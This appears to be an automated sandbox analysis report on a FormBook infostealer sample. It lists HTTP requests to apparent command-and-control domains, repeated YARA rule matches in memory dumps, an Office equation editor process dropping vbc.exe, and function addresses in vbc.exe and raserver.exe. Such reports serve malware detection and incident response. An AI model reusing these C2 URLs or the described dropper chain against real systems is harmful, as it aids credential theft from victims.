Source: global traffic	HTTP traffic detected: GET /9gr5/?gvT8Z=xQZabMU8dpACe7vSnuiwD/QS3vczr7oZL8st36+z5QOTIlaedyvl1J6mLYwfvajeV4x6zA==&wrx=KX64Xbs0GT8 HTTP/1.1Host: www.mountfrenchlodge.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9gr5/?gvT8Z=ywSUfm2fQGK6UvQCK3y+m09HhIkd7Ec2I38ZOQmE/hAglw7BpPTyU9WfPvviQ4VjNkYSbA==&wrx=KX64Xbs0GT8 HTTP/1.1Host: www.cuteprofessionalscrubs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud:

Yara detected FormBook

Source: Yara match	File source: 4.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.442632634.00000000098BF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.413230327.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.412873082.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.482437472.0000000000370000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.665645508.0000000001BC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.434267788.00000000098BF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.665856666.0000000001BF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.482329327.0000000000130000.00000040.00020000.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Source: 4.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.442632634.00000000098BF000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.442632634.00000000098BF000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.413230327.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.413230327.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.412873082.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.412873082.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.482437472.0000000000370000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.482437472.0000000000370000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.665645508.0000000001BC0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.665645508.0000000001BC0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.434267788.00000000098BF000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.434267788.00000000098BF000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.665856666.0000000001BF0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.665856666.0000000001BF0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.482329327.0000000000130000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.482329327.0000000000130000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Yara signature match

Source: 4.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.442632634.00000000098BF000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.442632634.00000000098BF000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.413230327.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.413230327.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.412873082.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.412873082.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.482437472.0000000000370000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.482437472.0000000000370000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.665645508.0000000001BC0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.665645508.0000000001BC0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.434267788.00000000098BF000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.434267788.00000000098BF000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.665856666.0000000001BF0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.665856666.0000000001BF0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.482472873.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.482329327.0000000000130000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.482329327.0000000000130000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 3_2_0109A2A9		3_2_0109A2A9
Source: C:\Users\Public\vbc.exe	Code function: 3_2_0045655F		3_2_0045655F
Source: C:\Users\Public\vbc.exe	Code function: 3_2_00455918		3_2_00455918
Source: C:\Users\Public\vbc.exe	Code function: 3_2_00455928		3_2_00455928
Source: C:\Users\Public\vbc.exe	Code function: 3_2_00455B78		3_2_00455B78
Source: C:\Users\Public\vbc.exe	Code function: 3_2_0109A035		3_2_0109A035
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00401030		4_2_00401030
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0041DB58		4_2_0041DB58
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0041E4E9		4_2_0041E4E9
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00402D89		4_2_00402D89
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00402D90		4_2_00402D90
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0041E59C		4_2_0041E59C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0041D5A3		4_2_0041D5A3
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0041EDB1		4_2_0041EDB1
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0041DE45		4_2_0041DE45
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00409E5C		4_2_00409E5C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00409E60		4_2_00409E60
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00402FB0		4_2_00402FB0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0109A2A9		4_2_0109A2A9
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A4E0C6		4_2_00A4E0C6
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A7D005		4_2_00A7D005
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00ACD06D		4_2_00ACD06D
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A53040		4_2_00A53040
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A6905A		4_2_00A6905A
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A4E2E9		4_2_00A4E2E9
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00AF1238		4_2_00AF1238
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00AF63BF		4_2_00AF63BF
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A4F3CF		4_2_00A4F3CF
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A763DB		4_2_00A763DB
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A52305		4_2_00A52305
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A9A37B		4_2_00A9A37B
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A57353		4_2_00A57353
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A85485		4_2_00A85485
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A61489		4_2_00A61489
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00AD443E		4_2_00AD443E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A8D47D		4_2_00A8D47D
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00AD05E3		4_2_00AD05E3
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A6C5F0		4_2_00A6C5F0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A5351F		4_2_00A5351F
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A96540		4_2_00A96540
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A54680		4_2_00A54680
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A5E6C1		4_2_00A5E6C1
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00AF2622		4_2_00AF2622
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A9A634		4_2_00A9A634
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A5C7BC		4_2_00A5C7BC
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00AD579A		4_2_00AD579A
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A857C3		4_2_00A857C3
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00AEF8EE		4_2_00AEF8EE
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00ACF8C4		4_2_00ACF8C4
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A7286D		4_2_00A7286D
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A5C85C		4_2_00A5C85C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A529B2		4_2_00A529B2
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00AF098E		4_2_00AF098E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A669FE		4_2_00A669FE
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00AD394B		4_2_00AD394B
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00AD5955		4_2_00AD5955
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00B03A83		4_2_00B03A83
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00AFCBA4		4_2_00AFCBA4
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00AD6BCB		4_2_00AD6BCB
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A4FBD7		4_2_00A4FBD7
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00ADDBDA		4_2_00ADDBDA
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A77B00		4_2_00A77B00
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00AEFDDD		4_2_00AEFDDD
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A80D3B		4_2_00A80D3B
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A5CD5B		4_2_00A5CD5B
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A82E2F		4_2_00A82E2F
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A6EE4C		4_2_00A6EE4C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00AECFB1		4_2_00AECFB1
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00AC2FDC		4_2_00AC2FDC
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A60F3F		4_2_00A60F3F
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00A7DF7C		4_2_00A7DF7C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0109A035		4_2_0109A035
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01ECE0C6		6_2_01ECE0C6
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01F4D06D		6_2_01F4D06D
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01ED3040		6_2_01ED3040
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EE905A		6_2_01EE905A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EFD005		6_2_01EFD005
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01ECF3CF		6_2_01ECF3CF
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EF63DB		6_2_01EF63DB
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01F763BF		6_2_01F763BF
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01F1A37B		6_2_01F1A37B
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01ED7353		6_2_01ED7353
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01ED2305		6_2_01ED2305
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01ECE2E9		6_2_01ECE2E9
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01F71238		6_2_01F71238
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01F505E3		6_2_01F505E3
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EEC5F0		6_2_01EEC5F0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01F16540		6_2_01F16540
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01ED351F		6_2_01ED351F
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EE1489		6_2_01EE1489
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01F05485		6_2_01F05485
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01F0D47D		6_2_01F0D47D
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01F5443E		6_2_01F5443E
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01F057C3		6_2_01F057C3
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01EDC7BC		6_2_01EDC7BC
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_01F5579A		6_2_01F5579A
